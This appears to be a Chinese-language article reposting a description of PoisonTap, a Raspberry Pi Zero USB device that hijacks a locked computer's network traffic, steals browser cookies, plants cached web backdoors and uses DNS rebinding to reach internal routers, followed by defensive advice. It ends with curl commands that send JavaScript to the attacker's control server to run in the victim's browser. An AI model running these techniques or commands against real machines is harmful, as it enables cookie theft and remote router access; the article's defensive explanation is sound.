{{ v.name }}
{{ v.cls }}類
{{ v.price }} ¥{{ v.price }}
當(dāng)poison Tap插入被鎖定/密碼保護(hù)的電腦時(shí):
詳細(xì)的視頻介紹:
[embed]http://v.youku.com/v_show/id_XMTgyMjc3NDU2OA==.html[/embed]
poison Tap 繞過以下安全機(jī)制:
PoisonTap
PoisonTap是由 價(jià)值5$的Raspberry Pi Zero構(gòu)建的,除了微型USB電纜和microSD卡之外不需要任何其它額外組件,但PoisonTap可以在其它可以模擬USB小部件(如USB Armory和LAN Turtle)的設(shè)備上工作。
(incredible HTML5 canvas animation by Ara) Video Demo: https://youtu.be/Aatp5gCskvk Point of Contact: @SamyKamkar // https://samy.pl Released: November 16, 2016 Source code and download: https://github.com/samyk/poisontapHow PoisonTap Works
PoisonTap通過利用機(jī)器和網(wǎng)絡(luò)的各種機(jī)制(包括USB / Thunderbolt,DHCP,DNS和HTTP)中現(xiàn)有的信任來產(chǎn)生級聯(lián)效應(yīng),從而產(chǎn)生信息滲透,網(wǎng)絡(luò)訪問和半永久后門的安裝的雪球效應(yīng)。
簡而言之,PoisonTap執(zhí)行以下操作:
網(wǎng)絡(luò)攻擊
1.網(wǎng)絡(luò)劫持攻擊者將PoisonTap(例如武裝強(qiáng)化的Raspberry Pi Zero)插入鎖定的計(jì)算機(jī)(即使計(jì)算機(jī)受密碼保護(hù)) 2.PoisonTap模擬以太網(wǎng)設(shè)備(例如,USB / Thunderbolt) - 默認(rèn)情況下,Windows,OS X和Linux識(shí)別以太網(wǎng)設(shè)備,自動(dòng)將其作為低優(yōu)先級網(wǎng)絡(luò)設(shè)備加載并在其上執(zhí)行DHCP請求,即使機(jī)器被鎖定或密碼保護(hù) 3.PoisonTap響應(yīng)DHCP請求并為機(jī)器提供IP地址,但是DHCP響應(yīng)的目的是告訴機(jī)器整個(gè)IPv4空間(0.0.0.0 - 255.255.255.255)是PoisonTap本地網(wǎng)絡(luò)的一部分,而不是子網(wǎng)(如192.168.0.0 - 192.168.0.255)
抓取Cookie
1.只要Web瀏覽器正在運(yùn)行后臺(tái),每打開一個(gè)頁面,服務(wù)器后臺(tái)都要進(jìn)行http請求(例如加載新廣告,將數(shù)據(jù)發(fā)送到分析平臺(tái),或者只是繼續(xù)跟蹤您的網(wǎng)絡(luò)運(yùn)動(dòng))
2.根據(jù)此HTTP請求,由于所有流量都退出到PoisonTap設(shè)備,PoisonTap DNS欺騙即時(shí)返回其自己的地址,導(dǎo)致HTTP請求命中PoisonTap Web服務(wù)器(Node.js)
3.當(dāng)Node web服務(wù)器接收到請求時(shí),PoisonTap會(huì)響應(yīng)一個(gè)可以解釋為HTML或Javascript的響應(yīng),這兩個(gè)都正確執(zhí)行(許多網(wǎng)站將在后臺(tái)請求中加載HTML或JS) 4.然后,HTML / JS-agnostic頁面會(huì)生成許多隱藏的iframe,每個(gè)iframe跨越不同的Alexa-top-100萬個(gè)域
基于web后門的遠(yuǎn)程訪問
1.雖然PoisonTap正在生產(chǎn)數(shù)千個(gè)iframe,迫使瀏覽器加載每個(gè)iframe,但這些iframe不僅僅是空白頁面,而是無限緩存的HTML + Javascript后門 2.即使用戶當(dāng)前未登錄,由于PoisonTap在每個(gè)域上強(qiáng)制緩存這些后門,后門被綁定到該域,使攻擊者能夠使用域的Cookie并在將來啟動(dòng)同源請求,即使用戶當(dāng)前未登錄
3.頁面的實(shí)際響應(yīng)是HTML和Javascript的組合,其產(chǎn)生持續(xù)的WebSocket到攻擊者的web服務(wù)器(通過因特網(wǎng),而不是PoisonTap設(shè)備)
[caption id="attachment_92146" align="aligncenter" width="628"]
OLYMPUS DIGITAL CAMERA[/caption]
內(nèi)部路由器后門和遠(yuǎn)程訪問
1.PoisonTap不能劫持是真正的網(wǎng)絡(luò)接口的實(shí)際LAN子網(wǎng)(例如,如果用戶的wifi子網(wǎng)是192.168.0.x,這個(gè)網(wǎng)絡(luò)不受影響),但... 2.PoisonTap在一個(gè)特別主機(jī)上強(qiáng)制緩存后門,具體地,目標(biāo)路由器的IP后面加上“.ip.samy.pl”,例如。 192.168.0.1.ip.samy.pl,基本上產(chǎn)生持久的DNS重綁定攻擊
3.DNS綁定和DNS重綁的安全性由于耗盡DNS綁定表而被繞過。由于之前做出的成千上萬次的請求,DNS不需要重新綁定,使得該攻擊可以持續(xù)很長時(shí)間(感謝Matt Austin分享這種攻擊思路?。?4.現(xiàn)在,后門強(qiáng)制連接到http://192.168.0.1.ip.samy.pl/PoisonTap,任何對192.168.0.1.ip.samy.pl的請求都將命中非固定的IP地址,導(dǎo)致192.168.0.1 以解析,直接指向路由器 5.這意味著如果通過后門遠(yuǎn)程在iframe中加載192.168.0.1.ip.samy.pl/PoisonTap主機(jī),你可以對內(nèi)部路由器上的任何其他頁面執(zhí)行AJAX GET / POST,完全遠(yuǎn)程,從而允許遠(yuǎn)程訪問內(nèi)部路由器
Recap of the DNS server:
[ip.addy].ip.samy.pl normally responds with [ip.addy] 192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record) [ip.addy].pin.ip.samy.pl temporarily (~5 seconds) points *.ip.samy.pl to [ip.addy] 1.0.0.1.pin.ip.samy.pl -> 1.0.0.1 192.168.0.1.ip.samy.pl -> 1.0.0.1 (A record, short TTL) (after ~5 seconds) 192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record)
基于web遠(yuǎn)程訪問的其它后門
1.此外,PoisonTap替代了成千上萬的常見的,基于CDN的Javascript文件,如谷歌和jQuery CDNs。在確定安全的代碼加上一個(gè)后門,可以讓攻擊者訪問任何域時(shí)加載受感染的基于CDN的Javascript文件 2.由于每個(gè)域上都留有后門,即使當(dāng)前受害者沒有對當(dāng)前域任何開放任何窗口,攻擊者幾乎可以遠(yuǎn)程強(qiáng)制后端瀏覽器在任何主域上執(zhí)行同源請求(AJAX GET / POST) 3.當(dāng)受害者訪問網(wǎng)站時(shí),后門現(xiàn)在可以在任何額外的網(wǎng)站上使用這些受感染的,基于HTTP的CDN Javascript框架
安全預(yù)防posion Tap
服務(wù)端安全
如果你正在運(yùn)行一個(gè)web服務(wù)器,以下是安全防御posion Tap的樣例: 1.僅使用HTTPS,至少為認(rèn)證和已認(rèn)證的內(nèi)容使用HTTPS 2.老實(shí)說,你應(yīng)該單獨(dú)使用HTTPS,并始終將HTTP內(nèi)容重定向到HTTPS,防止用戶通過HTTP提交被欺騙提供的憑據(jù)或其它PII 3.確保在Cookie上啟用安全標(biāo)記,防止通過HTTP泄漏HTTPS Cookie 4.使用HSTS防止HTTPS降級攻擊
桌面安全
1.拿粘合劑封住USB和Thunderbolt端口效果不錯(cuò)(與第3條類似,不過這里是物理封鎖---小編注) 2.每次離開機(jī)器時(shí)關(guān)閉瀏覽器,不過這是完全不切實(shí)際的 3.禁用USB / Thunderbolt端口也是有效的,雖然也不切實(shí)際 4.鎖定計(jì)算機(jī)沒有任何效果,因?yàn)榫W(wǎng)絡(luò)和USB堆棧在機(jī)器鎖定期間操作。但是,計(jì)算機(jī)進(jìn)入加密睡眠模式(例如,F(xiàn)ileVault2 +深度睡眠)可以解決大多數(shù)問題,因?yàn)閮?nèi)存需要內(nèi)存需要秘鑰解密,即使你的瀏覽器被喚醒。它仍然不能提出任何請求。
Code下載地址:
Source code: https://github.com/samyk/poisontap文件分解
在poisontap中有許多文件,它們用于不同的方面。 以下是文件列表:
# pop alert to victim curl 'http://samy.pl:1337/exec?alert("muahahahaha")' # to set a cookie on victim curl 'http://samy.pl:1337/exec?document.cookie="key=value"' # to force victim to load a url via ajax (note, jQuery is stored inside the backdoor) curl 'http://samy.pl:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",function(d)\{console.log(d)\})'